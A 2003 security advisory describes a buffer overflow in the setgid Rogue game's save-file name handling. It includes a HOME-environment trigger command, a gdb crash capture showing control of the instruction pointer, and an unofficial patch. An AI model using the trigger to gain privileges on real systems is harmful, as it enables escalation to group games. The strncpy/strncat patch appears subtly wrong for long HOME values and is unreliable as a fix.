Rogue buffer overflow
PROGRAM: Rogue
VENDOR: Tim Stoehr et al.
DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html
(any file called "*rogue*" in that directory)
DMOZ/ODP: http://dmoz.org/Games/Video_Games/Roleplaying/Rogue-like/
DESCRIPTION:
Rogue is a text-based role-playing computer game with a long
history. It is the first of the rogue-like games.
SUMMARY:
Rogue's save game function (capital S) suffers from a buffer
overflow. The program is usually installed setgid games, so
successful exploitation means getting that group's access rights.
TECHNICAL DETAILS:
If you specify a file name for saving beginning with a tilde
(~), Rogue will replace that character with the contents of
the environment variable HOME. This happens in the function
save_into_file() in save.c. The concatenation of that environment
variable with the rest of the file name takes place in a buffer of
80 characters, and the code doesn't check if it is overrun or not.
We can exploit this by giving the HOME environment variable a value
that is 111 characters long, and by saving a game with a file name
that is two characters long: a tilde (~) and one more character. That
second character in the file name will be the highest byte in the
address that the processor jumps to. The other bytes in the address
come from the HOME environment variable.
Here is a session capture that illustrates this problem:
$ export HOME=`perl -e 'print "U" x 111;'`
$ gdb rogue
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/vsu/secwork/rogue/rogue
[rogue session snipped]
file name? ~A
~A-more-
problem accessing the save file
Program received signal SIGSEGV, Segmentation fault.
0x41555555 in ?? ()
(gdb) bt
#0 0x41555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x1f 31
ecx 0x656c69 6646889
edx 0xff646b68 -10196120
ebx 0x4213030c 1108542220
esp 0xbfffdd90 0xbfffdd90
ebp 0x55555555 0x55555555
esi 0x40013020 1073819680
edi 0xbfffde84 -1073750396
eip 0x41555555 0x41555555
eflags 0x10286 66182
COMMUNICATION WITH VENDOR:
The program seems to be unmaintained, so I wrote an unofficial
patch instead.
MY PATCH:
I have attached a patch that corrects this problem. I have patched
against rogue985.
// Ulf Harnhammar
VSU Security
will audit PHP and Perl code for money
ulfh@update.uu.se
--- save.c.old Wed Feb 19 02:36:48 2003
+++ save.c Wed Feb 19 02:47:33 2003
@@ -67,8 +67,10 @@
if (sfile[0] == '~') {
if (hptr = md_getenv("HOME")) {
- (void) strcpy(name_buffer, hptr);
- (void) strcat(name_buffer, sfile+1);
+ /* Security fix, Ulf Harnhammar 2003 */
+ (void) strncpy(name_buffer, hptr, sizeof(name_buffer));
+ (void) strncat(name_buffer, sfile+1, sizeof(name_buffer) - strlen(hptr));
+ name_buffer[sizeof(name_buffer) - 1] = '\0';
sfile = name_buffer;
}
}
